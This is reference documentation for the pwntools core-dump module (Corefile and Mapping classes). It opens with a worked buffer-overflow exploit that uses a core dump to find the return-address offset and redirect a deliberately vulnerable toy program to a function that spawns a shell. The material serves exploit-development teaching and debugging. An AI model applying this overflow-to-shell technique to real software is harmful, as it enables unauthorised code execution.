`pwnlib.elf.corefile` — Core Files

Read information from Core Dumps.

Core dumps are extremely useful when writing exploits, even outside of ordinary debugging.

Using Corefiles to Automate Exploitation

For example, if you have a trivial buffer overflow and don’t want to open up a debugger or calculate offsets, you can use a generated core dump to extract the relevant information.

#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void win() {
    system("sh");
}
int main(int argc, char** argv) {
    char buffer[64];
    strcpy(buffer, argv[1]);
}

$ gcc crash.c -m32 -o crash -fno-stack-protector

from pwn import *

# Generate a cyclic pattern so that we can auto-find the offset
payload = cyclic(128)

# Run the process once so that it crashes
process(['./crash', payload]).wait()

# Get the core dump
core = Coredump('./core')

# Our cyclic pattern should have been used as the crashing address
assert pack(core.eip) in payload

# Cool! Now let's just replace that value with the address of 'win'
crash = ELF('./crash')
payload = fit({
    cyclic_find(core.eip): crash.symbols.win
})

# Get a shell!
io = process(['./crash', payload])
io.sendline(b'id')
print(io.recvline())
# uid=1000(user) gid=1000(user) groups=1000(user)
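
The offset recovery performed by cyclic() and cyclic_find() in the script above can be illustrated without pwntools. The following is a minimal sketch, not the library's implementation: de_bruijn, make_pattern and find_offset are hypothetical helper names, the lowercase alphabet and window size of 4 are assumed to match the pwntools defaults, and the register values are the eip and ebp shown in the Corefile.registers listing in this document.

```python
import itertools
import string
import struct

def de_bruijn(alphabet, n):
    """Yield a de Bruijn sequence: every window of n symbols occurs once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)

def make_pattern(length, n=4):
    """Build `length` bytes of pattern from the lowercase alphabet."""
    symbols = string.ascii_lowercase.encode()
    return bytes(itertools.islice(de_bruijn(symbols, n), length))

def find_offset(pattern, value):
    """Locate a 32-bit little-endian register value inside the pattern."""
    return pattern.find(struct.pack('<I', value))

pattern = make_pattern(128)
eip = 1633771892   # 0x61616174, i.e. b'taaa' in memory
ebp = 1633771891   # 0x61616173, i.e. b'saaa' in memory

print(pattern[:16])                 # b'aaaabaaacaaadaaa'
print(find_offset(pattern, ebp))    # 72
print(find_offset(pattern, eip))    # 76
```

Because every 4-byte window of the pattern is unique, the value that lands in the instruction pointer identifies exactly one offset into the payload, which is the key that fit() needs.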

Module Members

class pwnlib.elf.corefile.Corefile(*a, **kw)[source]

Bases: ELF

Enhances the information available about a corefile (which is an extension of the ELF format) by permitting extraction of information about the mapped data segments, and register state.

Registers can be accessed directly, e.g. via core_obj.eax and enumerated via Corefile.registers.

Memory can be accessed directly via pwnlib.elf.elf.ELF.read() or pwnlib.elf.elf.ELF.write(), and also via pwnlib.elf.elf.ELF.pack() or pwnlib.elf.elf.ELF.unpack() or even string().

Parameters:: core – Path to the core file. Alternately, may be a process instance, and the core file will be located automatically.

>>> c = Corefile('./core')
>>> hex(c.eax)
'0xfff5f2e0'
>>> c.registers
{'eax': 4294308576,
 'ebp': 1633771891,
 'ebx': 4151132160,
 'ecx': 4294311760,
 'edi': 0,
 'edx': 4294308700,
 'eflags': 66050,
 'eip': 1633771892,
 'esi': 0,
 'esp': 4294308656,
 'orig_eax': 4294967295,
 'xcs': 35,
 'xds': 43,
 'xes': 43,
 'xfs': 0,
 'xgs': 99,
 'xss': 43}

Mappings can be iterated in order via Corefile.mappings.

>>> Corefile('./core').mappings
[Mapping('/home/user/pwntools/crash', start=0x8048000, stop=0x8049000, size=0x1000, flags=0x5, page_offset=0x0),
 Mapping('/home/user/pwntools/crash', start=0x8049000, stop=0x804a000, size=0x1000, flags=0x4, page_offset=0x1),
 Mapping('/home/user/pwntools/crash', start=0x804a000, stop=0x804b000, size=0x1000, flags=0x6, page_offset=0x2),
 Mapping(None, start=0xf7528000, stop=0xf7529000, size=0x1000, flags=0x6, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf7529000, stop=0xf76d1000, size=0x1a8000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d1000, stop=0xf76d2000, size=0x1000, flags=0x0, page_offset=0x1a8),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d2000, stop=0xf76d4000, size=0x2000, flags=0x4, page_offset=0x1a9),
 Mapping('/lib/i386-linux-gnu/libc-2.19.so', start=0xf76d4000, stop=0xf76d5000, size=0x1000, flags=0x6, page_offset=0x1aa),
 Mapping(None, start=0xf76d5000, stop=0xf76d8000, size=0x3000, flags=0x6, page_offset=0x0),
 Mapping(None, start=0xf76ef000, stop=0xf76f1000, size=0x2000, flags=0x6, page_offset=0x0),
 Mapping('[vdso]', start=0xf76f1000, stop=0xf76f2000, size=0x1000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf76f2000, stop=0xf7712000, size=0x20000, flags=0x5, page_offset=0x0),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf7712000, stop=0xf7713000, size=0x1000, flags=0x4, page_offset=0x20),
 Mapping('/lib/i386-linux-gnu/ld-2.19.so', start=0xf7713000, stop=0xf7714000, size=0x1000, flags=0x6, page_offset=0x21),
 Mapping('[stack]', start=0xfff3e000, stop=0xfff61000, size=0x23000, flags=0x6, page_offset=0x0)]
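
A common use of the mapping list is to ask which region a register points into. The sketch below does this with plain tuples rather than Mapping objects; mapping_for is a hypothetical helper, and the table is a subset of the listing above.

```python
# (name, start, stop) triples copied from the Corefile.mappings listing.
MAPPINGS = [
    ('/home/user/pwntools/crash', 0x8048000, 0x8049000),
    ('/lib/i386-linux-gnu/libc-2.19.so', 0xf7529000, 0xf76d1000),
    ('[vdso]', 0xf76f1000, 0xf76f2000),
    ('[stack]', 0xfff3e000, 0xfff61000),
]

def mapping_for(address, mappings=MAPPINGS):
    """Return the name of the mapping containing address, or None."""
    for name, start, stop in mappings:
        if start <= address < stop:   # stop is the first byte after the mapping
            return name
    return None

print(mapping_for(4294308656))   # esp from the registers listing: [stack]
print(mapping_for(1633771892))   # eip from the registers listing: None
```

The crashing eip falls inside no mapping, which is what one would expect when the return address has been overwritten with pattern bytes.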

Examples

Let’s build an example binary which should crash with R0=0xdeadbeef and PC=0xcafebabe.

If we run the binary and then wait for it to exit, we can get its core file.

>>> context.clear(arch='arm')
>>> shellcode = shellcraft.mov('r0', 0xdeadbeef)
>>> shellcode += shellcraft.mov('r1', 0xcafebabe)
>>> shellcode += 'bx r1'
>>> address = 0x41410000
>>> elf = ELF.from_assembly(shellcode, vma=address)
>>> io = elf.process(env={'HELLO': 'WORLD'})
>>> io.poll(block=True)
-11

You can specify a full path a la Corefile('/path/to/core'), but you can also just access the process.corefile attribute.

There’s a lot of behind-the-scenes logic to locate the corefile for a given process, but it’s all handled transparently by Pwntools.

>>> core = io.corefile

The core file has an exe property, which is a Mapping object. Each mapping can be accessed with virtual addresses via subscript, or contents can be examined via the Mapping.data attribute.

>>> core.exe
Mapping('/.../step3', start=..., stop=..., size=0x1000, flags=0x..., page_offset=...)
>>> hex(core.exe.address)
'0x41410000'
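
Subscripting by virtual address amounts to translating an address into an offset within the mapping's data. The class below is a toy stand-in written for illustration only: ToyMapping is a hypothetical name, and the real Mapping may handle edge cases (negative indices, slice steps) differently.

```python
class ToyMapping:
    """Hypothetical stand-in: a run of bytes that lives at a virtual address."""

    def __init__(self, start, data):
        self.start = start
        self.stop = start + len(data)   # first byte after the mapping
        self.data = data

    def __getitem__(self, item):
        if isinstance(item, slice):
            lo = self.start if item.start is None else item.start
            hi = self.stop if item.stop is None else item.stop
        else:
            lo, hi = item, item + 1
        if not (self.start <= lo <= hi <= self.stop):
            raise IndexError('address range outside the mapping')
        # Translate virtual addresses into offsets within the data.
        return self.data[lo - self.start:hi - self.start]

exe = ToyMapping(0x41410000, b'\x7fELF' + b'\x00' * 12)
print(exe[0x41410000:0x41410004])   # b'\x7fELF'
print(exe.data[:4])                 # b'\x7fELF'
```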

The core file also has registers which can be accessed directly. Pseudo-registers pc and sp are available on all architectures, to make writing architecture-agnostic code simpler. If this were an amd64 corefile, we could access e.g. core.rax.

>>> core.pc == 0xcafebabe
True
>>> core.r0 == 0xdeadbeef
True
>>> core.sp == core.r13
True
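
The idea behind the pc and sp pseudo-registers can be sketched as a per-architecture lookup table. This is an illustration only: PC_SP_NAMES and pc_and_sp are hypothetical names, and the table assumes the register dictionary uses r15 and r13 for the ARM program counter and stack pointer.

```python
# Illustrative table: (program counter, stack pointer) register per architecture.
PC_SP_NAMES = {
    'i386': ('eip', 'esp'),
    'amd64': ('rip', 'rsp'),
    'arm': ('r15', 'r13'),
}

def pc_and_sp(arch, registers):
    """Look up the program counter and stack pointer without hard-coding names."""
    pc_name, sp_name = PC_SP_NAMES[arch]
    return registers[pc_name], registers[sp_name]

i386_regs = {'eip': 1633771892, 'esp': 4294308656}   # from the listing in this document
arm_regs = {'r15': 0xcafebabe, 'r13': 0x7ffee000}    # r13 value is made up

for arch, regs in (('i386', i386_regs), ('arm', arm_regs)):
    pc, sp = pc_and_sp(arch, regs)
    print(arch, hex(pc), hex(sp))
```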

We may not always know which signal caused the core dump, or what address caused a segmentation fault. Instead of accessing registers directly, we can also extract this information from the core dump via fault_addr and signal.

On QEMU-generated core dumps, this information is unavailable, so we substitute the value of PC. In our example, that’s correct anyway.

>>> core.fault_addr == 0xcafebabe
True
>>> core.signal
11

Core files can also be generated from running processes. This requires GDB to be installed, and can only be done with native processes. Getting a “complete” corefile requires GDB 7.11 or later.

>>> elf = ELF(which('bash-static'))
>>> context.clear(binary=elf)
>>> env = dict(os.environ)
>>> env['HELLO'] = 'WORLD'
>>> io = process(elf.path, env=env)
>>> io.sendline(b'echo hello')
>>> io.recvline()
b'hello\n'

The process is still running, but accessing its process.corefile property automatically invokes GDB to attach and dump a corefile.

>>> core = io.corefile
>>> io.close()

The corefile can be inspected and read from, and even exposes various mappings.

>>> core.exe
Mapping('.../bin/bash-static', start=..., stop=..., size=..., flags=..., page_offset=...)
>>> core.exe.data[0:4]
b'\x7fELF'

It also supports all of the features of ELF, so you can use pwnlib.elf.elf.ELF.read() or pwnlib.elf.elf.ELF.write(), or even helpers like pwnlib.elf.elf.ELF.pack() or pwnlib.elf.elf.ELF.unpack().

Don’t forget to call ELF.save() to save the changes to disk.

>>> core.read(elf.address, 4)
b'\x7fELF'
>>> core.pack(core.sp, 0xdeadbeef)
>>> core.save()

Let’s re-load it as a new Corefile object and have a look!

>>> core2 = Corefile(core.path)
>>> hex(core2.unpack(core2.sp))
'0xdeadbeef'
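
Conceptually, pack() and unpack() write and read a word at a virtual address. The sketch below mimics that for 32-bit little-endian values over an in-memory buffer. ToyMemory, its base address and the sp value are all hypothetical, and nothing here touches a real core file.

```python
import struct

class ToyMemory:
    """Hypothetical stand-in for memory addressed by virtual address."""

    def __init__(self, base, size):
        self.base = base
        self.buf = bytearray(size)

    def pack(self, address, value):
        # Write a 32-bit little-endian word at the given virtual address.
        struct.pack_into('<I', self.buf, address - self.base, value)

    def unpack(self, address):
        # Read a 32-bit little-endian word from the given virtual address.
        return struct.unpack_from('<I', self.buf, address - self.base)[0]

    def read(self, address, count):
        offset = address - self.base
        return bytes(self.buf[offset:offset + count])

mem = ToyMemory(0xfff3e000, 0x1000)
sp = 0xfff3e010                 # made-up stack pointer inside the buffer
mem.pack(sp, 0xdeadbeef)
print(hex(mem.unpack(sp)))      # 0xdeadbeef
print(mem.read(sp, 4))          # b'\xef\xbe\xad\xde'
```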

Various other mappings are available by name. Each refers to the first segment of the corresponding region:

exe – the executable
libc – the loaded libc, if any
stack – the stack mapping
vvar
vdso
vsyscall
On Linux, 32-bit Intel binaries should have a VDSO section via vdso. Since our ELF is statically linked, there is no libc which gets mapped.

>>> core.vdso.data[:4]
b'\x7fELF'
>>> core.libc

But if we dump a corefile from a dynamically-linked binary, the libc will be loaded.

>>> process('bash').corefile.libc
Mapping('.../libc...so...', start=0x..., stop=0x..., size=0x..., flags=..., page_offset=...)

The corefile also contains a stack property, which gives us direct access to the stack contents. On Linux, the very top of the stack should contain two pointer-widths of NULL bytes, preceded by the NULL-terminated path to the executable (as passed via the first arg to execve).

>>> core.stack
Mapping('[stack]', start=0x..., stop=0x..., size=0x..., flags=0x6, page_offset=0x0)

When creating a process, the kernel puts the absolute path of the binary and some padding bytes at the end of the stack. We can look at those by looking at core.stack.data.

>>> size = len('/bin/bash-static') + 8
>>> core.stack.data[-size:]
b'bin/bash-static\x00\x00\x00\x00\x00\x00\x00\x00\x00'
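
The slice above relies on knowing the length of the path in advance. When it is not known, the path can be recovered by scanning backwards past the padding. A minimal sketch on a hand-built buffer follows; path_from_stack_tail is a hypothetical helper and the bytes are made up to resemble the layout described above.

```python
def path_from_stack_tail(stack_data):
    """Return the NUL-terminated string that sits just before the trailing NUL padding."""
    trimmed = stack_data.rstrip(b'\x00')      # drop the padding and the terminator
    start = trimmed.rfind(b'\x00') + 1        # byte after the previous string's terminator
    return trimmed[start:]

# Made-up stack tail: an environment string, the executable path, then 8 NUL bytes.
tail = b'HELLO=WORLD\x00' + b'/bin/bash-static\x00' + b'\x00' * 8

print(path_from_stack_tail(tail))             # b'/bin/bash-static'

size = len('/bin/bash-static') + 8
print(tail[-size:])                           # same slice as in the example above
```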

We can also directly access the environment variables and arguments, via argc, argv, and env.

>>> 'HELLO' in core.env
True
>>> core.string(core.env['HELLO'])
b'WORLD'
>>> core.getenv('HELLO')
b'WORLD'
>>> core.argc
1
>>> core.argv[0] in core.stack
True
>>> core.string(core.argv[0])
b'.../bin/bash-static'
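
The argc, argv and env values come from the initial process stack, which on Linux holds argc, then the argv pointers, a NULL, the envp pointers and another NULL. The sketch below parses a hand-built 32-bit little-endian image of that layout. It is an illustration under those assumptions, not the Corefile implementation: parse_initial_stack, read_cstring and the BASE address are hypothetical.

```python
import struct

BASE = 0xfff60000   # made-up virtual address of the toy stack image

def read_cstring(mem, base, address):
    """Read a NUL-terminated string at a virtual address."""
    offset = address - base
    return mem[offset:mem.index(b'\x00', offset)]

def parse_initial_stack(mem, base, argc_address):
    """Return (argc, argv addresses, {env name: address of its value})."""
    offset = argc_address - base
    (argc,) = struct.unpack_from('<I', mem, offset)
    offset += 4
    argv = list(struct.unpack_from('<%dI' % argc, mem, offset))
    offset += 4 * (argc + 1)                  # skip argv[] and its NULL terminator
    env = {}
    while True:
        (pointer,) = struct.unpack_from('<I', mem, offset)
        offset += 4
        if pointer == 0:                      # NULL ends envp[]
            break
        name, _, _ = read_cstring(mem, base, pointer).partition(b'=')
        env[name.decode()] = pointer + len(name) + 1   # address just past the first '='
    return argc, argv, env

# Build the image: six 32-bit words followed by the strings they point to.
strings = b'./crash\x00HELLO=WORLD\x00FOO=BAR=BAZ\x00'
argv0 = BASE + 4 * 6
env0 = argv0 + len(b'./crash\x00')
env1 = env0 + len(b'HELLO=WORLD\x00')
mem = struct.pack('<6I', 1, argv0, 0, env0, env1, 0) + strings

argc, argv, env = parse_initial_stack(mem, BASE, BASE)
print(argc, read_cstring(mem, BASE, argv[0]))   # 1 b'./crash'
print(read_cstring(mem, BASE, env['HELLO']))    # b'WORLD'
print(read_cstring(mem, BASE, env['FOO']))      # b'BAR=BAZ'
```

Splitting on the first '=' only is what keeps a value such as BAR=BAZ intact.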

Corefiles can also be pulled from remote machines via SSH!

>>> s = ssh(user='travis', host='example.pwnme', password='demopass')
>>> _ = s.set_working_directory()
>>> elf = ELF.from_assembly(shellcraft.trap())
>>> path = s.upload(elf.path)
>>> _ = s.chmod('+x', path)
>>> io = s.process(path)
>>> io.wait(1)
-1
>>> io.corefile.signal == signal.SIGTRAP
True

Make sure fault_addr synthesis works for amd64 on ret.

>>> context.clear(arch='amd64')
>>> elf = ELF.from_assembly('push 1234; ret')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.fault_addr
1234

Corefile.getenv() works correctly, even if the environment variable’s value contains embedded ‘=’. Corefile is able to find the stack, even if the stack pointer doesn’t point at the stack.

>>> elf = ELF.from_assembly(shellcraft.crash())
>>> io = elf.process(env={'FOO': 'BAR=BAZ'})
>>> io.wait(1)
>>> core = io.corefile
>>> core.getenv('FOO')
b'BAR=BAZ'
>>> core.sp == 0
True
>>> core.sp in core.stack
False

Corefile gracefully handles the stack being filled with garbage, including argc / argv / envp being overwritten.

>>> context.clear(arch='i386')
>>> assembly = '''
... LOOP:
...   mov dword ptr [esp], 0x41414141
...   pop eax
...   jmp LOOP
... '''
>>> elf = ELF.from_assembly(assembly)
>>> io = elf.process()
>>> io.wait(2)
>>> core = io.corefile
>>> core.argc, core.argv, core.env
(0, [], {})
>>> core.stack.data.endswith(b'AAAA')
True
>>> core.fault_addr == core.sp
True

__init__(*a, **kw)[source]

_populate_got()[source]

Loads the symbols for all relocations.

>>> libc = ELF(which('bash')).libc
>>> assert 'strchrnul' in libc.got
>>> assert 'memcpy' in libc.got
>>> assert libc.got.strchrnul != libc.got.memcpy

_populate_plt()[source]

Loads the PLT symbols

>>> path = pwnlib.data.elf.path
>>> for test in glob(os.path.join(path, 'test-*')):
...     test = ELF(test)
...     assert '__stack_chk_fail' in test.got, test
...     if test.arch != 'ppc':
...         assert '__stack_chk_fail' in test.plt, test

debug()[source]: Open the corefile under a debugger.

getenv(name) → str[source]

Read an environment variable off the stack, and return its contents.

Parameters:: name (str) – Name of the environment variable to read.
Returns:: str – The contents of the environment variable.

Example

>>> elf = ELF.from_assembly(shellcraft.trap())
>>> io = elf.process(env={'GREETING': 'Hello!'})
>>> io.wait(1)
>>> io.corefile.getenv('GREETING')
b'Hello!'

argc[source]

Number of arguments passed

Type:: int

argc_address[source]

Pointer to argc on the stack

Type:: int

argv[source]

List of addresses of arguments on the stack.

Type:: list

argv_address[source]

Pointer to argv on the stack

Type:: int

envp_address[source]

Pointer to envp on the stack

Type:: int

property exe[source]

First mapping for the executable file.

Type:: Mapping

property fault_addr[source]

Address which generated the fault, for the signals: SIGILL, SIGFPE, SIGSEGV, SIGBUS. This is only available in native core dumps created by the kernel. If the information is unavailable, this returns the address of the instruction pointer.

Example

>>> elf = ELF.from_assembly('mov eax, 0xdeadbeef; jmp eax', arch='i386')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.fault_addr == io.corefile.eax == 0xdeadbeef
True

Type:: int
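
The fallback described above can be sketched as a small decision function. This is an illustration of the documented behaviour, not the library's code: fault_address is a hypothetical helper, and si_addr=None stands in for a dump that carries no fault information (for example one generated by QEMU).

```python
import signal

# Signals for which the kernel records a faulting address.
FAULT_SIGNALS = {signal.SIGILL, signal.SIGFPE, signal.SIGSEGV, signal.SIGBUS}

def fault_address(signo, si_addr, pc):
    """Prefer the recorded fault address; otherwise fall back to the program counter."""
    if signo in FAULT_SIGNALS and si_addr is not None:
        return si_addr
    return pc

# Native dump: the kernel recorded the address that faulted.
print(hex(fault_address(signal.SIGSEGV, 0xdeadbeef, 0xdeadbeef)))
# Dump without fault information: the program counter is substituted.
print(hex(fault_address(signal.SIGSEGV, None, 0xcafebabe)))
```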

property libc[source]

First mapping for libc.so

Type:: Mapping

mappings[source]

A list of Mapping objects for each loaded memory region

Type:: list

property maps[source]

A printable string which is similar to /proc/xx/maps.

>>> print(Corefile('./core').maps)
8048000-8049000 r-xp 1000 /home/user/pwntools/crash
8049000-804a000 r--p 1000 /home/user/pwntools/crash
804a000-804b000 rw-p 1000 /home/user/pwntools/crash
f7528000-f7529000 rw-p 1000 None
f7529000-f76d1000 r-xp 1a8000 /lib/i386-linux-gnu/libc-2.19.so
f76d1000-f76d2000 ---p 1000 /lib/i386-linux-gnu/libc-2.19.so
f76d2000-f76d4000 r--p 2000 /lib/i386-linux-gnu/libc-2.19.so
f76d4000-f76d5000 rw-p 1000 /lib/i386-linux-gnu/libc-2.19.so
f76d5000-f76d8000 rw-p 3000 None
f76ef000-f76f1000 rw-p 2000 None
f76f1000-f76f2000 r-xp 1000 [vdso]
f76f2000-f7712000 r-xp 20000 /lib/i386-linux-gnu/ld-2.19.so
f7712000-f7713000 r--p 1000 /lib/i386-linux-gnu/ld-2.19.so
f7713000-f7714000 rw-p 1000 /lib/i386-linux-gnu/ld-2.19.so
fff3e000-fff61000 rw-p 23000 [stack]

Type:: str

property pc[source]

The program counter for the Corefile

This is a cross-platform way to get e.g. core.eip, core.rip, etc.

Type:: int

property pid[source]

PID of the process which created the core dump.

Type:: int

property ppid[source]

Parent PID of the process which created the core dump.

Type:: int

prpsinfo[source]: The NT_PRPSINFO object

prstatus[source]: The NT_PRSTATUS object.

property registers[source]

All available registers in the coredump.

Example

>>> elf = ELF.from_assembly('mov eax, 0xdeadbeef;' + shellcraft.trap(), arch='i386')
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.registers['eax'] == 0xdeadbeef
True

Type:: dict

siginfo[source]: The NT_SIGINFO object

property signal[source]

Signal which caused the core to be dumped.

Example

>>> elf = ELF.from_assembly(shellcraft.trap())
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.signal == signal.SIGTRAP
True

>>> elf = ELF.from_assembly(shellcraft.crash())
>>> io = elf.process()
>>> io.wait(1)
>>> io.corefile.signal == signal.SIGSEGV
True

Type:: int

property sp[source]

The stack pointer for the Corefile

This is a cross-platform way to get e.g. core.esp, core.rsp, etc.

Type:: int

stack[source]

Environment variables read from the stack. Keys are the environment variable name, values are the memory address of the variable.

Use getenv() or string() to retrieve the textual value.

Note: If FOO=BAR is in the environment, self.env['FOO'] is the address of the string "BAR\x00".

property vdso[source]

Mapping for the vdso section

Type:: Mapping

property vsyscall[source]

Mapping for the vsyscall section

Type:: Mapping

property vvar[source]

Mapping for the vvar section

Type:: Mapping

class pwnlib.elf.corefile.Mapping(core, name, start, stop, flags, page_offset)[source]

Encapsulates information about a memory mapping in a Corefile.

__init__(core, name, start, stop, flags, page_offset)[source]

__repr__()[source]: Return repr(self).

__str__()[source]: Return str(self).

find(sub, start=None, end=None)[source]: Similar to str.find() but works on our address space

rfind(sub, start=None, end=None)[source]: Similar to str.rfind() but works on our address space
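
Searching "on our address space" means that both the bounds and the result are virtual addresses rather than offsets into the data. The sketch below shows that translation on a made-up buffer. find_address and rfind_address are hypothetical helpers, and returning -1 when nothing is found is an assumption carried over from bytes.find().

```python
def find_address(data, base, sub, start=None, end=None):
    """Search data (mapped at virtual address base); return a virtual address or -1."""
    lo = 0 if start is None else start - base
    hi = len(data) if end is None else end - base
    index = data.find(sub, lo, hi)
    return index if index == -1 else base + index

def rfind_address(data, base, sub, start=None, end=None):
    """Same as find_address, but returns the last match."""
    lo = 0 if start is None else start - base
    hi = len(data) if end is None else end - base
    index = data.rfind(sub, lo, hi)
    return index if index == -1 else base + index

base = 0x8048000
data = b'\x7fELF' + b'\x00' * 4 + b'/bin/sh\x00' + b'/bin/sh\x00'

print(hex(find_address(data, base, b'/bin/sh')))    # 0x8048008
print(hex(rfind_address(data, base, b'/bin/sh')))   # 0x8048010
print(find_address(data, base, b'ELF', start=base + 4))   # -1
```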

__weakref__[source]: list of weak references to the object

property address[source]

Alias for Mapping.start.

Type:: int

property data[source]

Memory of the mapping.

Type:: str

flags[source]

Mapping flags, using e.g. PROT_READ and so on.

Type:: int

name[source]

Name of the mapping, e.g. '/bin/bash' or '[vdso]'.

Type:: str

page_offset[source]

Offset in pages in the mapped file

Type:: int

property path[source]

Alias for Mapping.name

Type:: str

property permstr[source]

Human-readable memory permission string, e.g. r-xp.

Type:: str
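
The relationship between flags and the permission string can be read off the listings in this document: flags=0x5 appears as r-xp, 0x4 as r--p and 0x6 as rw-p. That is consistent with ELF program-header flag bits (PF_X=1, PF_W=2, PF_R=4). The function below is a sketch inferred from those listings rather than taken from the library, and the trailing 'p' is assumed to be constant.

```python
PF_X, PF_W, PF_R = 1, 2, 4   # ELF program-header flag bits

def permstr(flags):
    """Render segment flags in the style of /proc/<pid>/maps."""
    return ''.join([
        'r' if flags & PF_R else '-',
        'w' if flags & PF_W else '-',
        'x' if flags & PF_X else '-',
        'p',
    ])

for flags in (0x5, 0x4, 0x6, 0x0):
    print(hex(flags), permstr(flags))
```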

size[source]

Size of the mapping, in bytes

Type:: int

start[source]

First mapped byte in the mapping

Type:: int

stop[source]

First byte after the end of the mapping

Type:: int
